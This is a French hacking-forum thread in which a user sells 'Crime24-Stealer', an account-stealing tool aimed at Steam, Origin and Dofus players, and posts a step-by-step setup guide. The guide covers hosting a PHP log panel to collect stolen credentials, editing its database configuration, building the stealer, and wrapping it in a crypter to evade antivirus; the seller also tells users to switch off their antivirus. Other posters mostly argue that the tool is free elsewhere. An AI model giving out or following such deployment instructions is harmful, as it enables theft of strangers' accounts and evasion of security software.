TERMINE Crime24-Stealer 5€ PayPal

Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Status
Not open for further replies.

QuArTz95

Membre
Nov 18, 2012
54
0
206
31
Bonjour aujourd'hui je mes en ventes le logiciel Crime24-Stealer il va vous permettre de usurper des compte [Steam,Origin,Dofus ...] en utilisant un site Hébergeur. J'en demande 5€ PayPal un prix tous a fait raisonnable selon moi vue le nombre de fake et virus que en trouve sur le net.Pour prouver que je suis pas un voleur j'offre gratuitement le logiciel a la première personne.Encore une chose quand vous le télécharger sur votre ordinateur votre antivirus va vous dire normalement que ses un hack ses normal mes ses pas un hack mes le antivirus le considère comme un logiciel mal veillant ceux qui sont un peu caler dans l'informatique comprendront de quoi je parle donc faut désactiver le antivirus quand en l'utilise.Pour me contacter ses très simple soi me laisser un message sur se forum soi m'ajouter sur Skype : Falko27000.

Screens :
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Cordialement QuArTz95.

Last edited:

chouki

Membre Banni
Feb 25, 2011
146
0
441
1er personne reçu gratuitement comme prévu
Personne de confiance je recommande
Codialement

QuArTz95

Membre
Nov 18, 2012
54
0
206
31
# Etape 1:
Enregistrez vous sur Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris! afin d'obtenir un FTP ainsi qu'une base MySQL gratuitement.

# Etape 2:
Une fois votre inscription terminé, allez à votre panel: "UserCP".
Cliquez sur "Create/delete MySQL database".

Nommez la base comme bon vous semble, cela va inclure votre nom d'utilisateur (username).
Dans cet exemple mon nom d'utilisateur sera: "exemple".
Et ma base MySQL portera le nom "exemple_db".
Cliquez sur "Create Database".

Maintenant pour l'utilisateur (user), le mien se nomme "exemple_user"
Choisissez un mot de passe de votre choix, pour ma part ce sera: "passw0rd"
Cliquez sur "Create User".

Pour attribuer les privilèges, vérifiez que l'utilisateur et la base MySQL soient bien sélectionnés dans la liste.
Quand toutes les cases sont cochées, cliquez sur "Assign Priviledges".

# Etape 3:
Ouvrez Crime24 StealerPHP Loggerindex.php et éditez la partie "Configuration".
Je vais vous montrer ma configuration en suivant mon exemple:

$dbHost = "localhost"; // MySQL host => Laissez comme ça
$dbUser = "exemple_user"; // MySQL username => Votre nom d'utilisateur de la base
$dbPass = "passw0rd"; // MySQL password => Votre mot de passe de la base
$dbDatabase = "exemple_db"; // MySQL database name => Le nom de votre database

$username = "Votre-Login"; // Login Username => Votre login pour vous connecter au panel de logs
$password = "Votre-Pass"; // Login Password => Votre mot de passe pour vous connecter au panel de logs

$logspage = 50; // Number of logs per page => Nombre de logs par page, laissez comme ça

On peux dire que c'est la partie la plus dur. Mais bon soyez logique, surtout que j'ai commenté afin que vous ne vous vous trompiez pas.

# Etape 4:
Retournez sur BlackAppleHost, cliquez syur "File manager" dans le "User CP" et uploadé index.php & style.css
Aprés cela, Crime24 Stealer est bien mis en place! Vous pouvez voir vos logs à l'adresse suivante: Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
Remplacez "username" par le login de votre compte BlackAppleHost.
Pour vous connecter au panel de logs, rentrez le "login & le mot de passe" que vous avez marqués dans la partie configuration.

# Etape 5:
Ouvrez Crime24 Stealer et remplissez les informations nécessaires.
L'URL sera: Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris! en remplaçant "username" par le login de votre compte BlackAppleHost.
Cliquez sur Build, et ça y est votre fichier est prêt à être propager!
Du moins presque prêt, ce dernier doit être à 50% détecté, donc utilisez un crypter afin de le rendre moins détecté.

Last edited:

QuArTz95

Membre
Nov 18, 2012
54
0
206
31
Desoler [K]aizer le gratuit c’était pour le premier si je te donne tous le monde le voudra gratuit surtout que 5€ ses pas beaucoup par rapport a ce qu'il peut vous rapporter je suis vraiment navré.

Jul 14, 2012
1,268
0
942
il est déjà gratuit :p et en plus c'est interdit ce genre de vente ici il vas être locked ce topic
cordialement Me!

QuArTz95

Membre
Nov 18, 2012
54
0
206
31
il & gratuit mes essaie de le trouver j'oblige personne a acheter y a que des fake et virus sur le net donc se que préfère se lancer dans la recherche bonne continuation moi je propose de faciliter la tache.

Cordialement QuArTz95.

iHeroWay

Membre Banni
Nov 18, 2012
38
0
206
Perso, j'ai trouvé un forum qui le donne gratuit et aussi, avec un tuto. (Non fake)

Cordialement,
iHeroWay.

QuArTz95

Membre
Nov 18, 2012
54
0
206
31
Je te félicite partage le gratuitement moi je le vend donc svp arrêter de polluer mon topic!

QuArTz95

Membre
Nov 18, 2012
54
0
206
31
Djlorten créer un tuto a part stp arrête de polluer mon topic tu sais quoi moi aussi je vais pourri des topic oeil pour oeil

Myne

Membre
May 25, 2012
27
0
306
Peut-tu poster un scan ?

On sais jamais si son fichier n'est pas backdoor, c'est fréquent sa.

ProR80

Membre
Oct 17, 2011
34
0
311
66
Il est gratuit, sur tout les board de Hack, vous avez aussi ISR qui est pas mal toujours gratuit. Quel honte de mettre un tool payant alors qu'il est gratuit.

QuArTz95

Membre
Nov 18, 2012
54
0
206
31
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Sortie pour tous les gens qui ne désire pas acheter ! J'oblige personne a acheter si la personne juge que il peux le trouver gratuit je lui souhaite bonne continuation.

peace1

Membre Banni
May 6, 2011
777
0
441
36
Pitoyable ... il est gratuit y'a vraiment les ânes qui ne le trouve pas

tu sais plus quoi vendre :D

Status
Not open for further replies.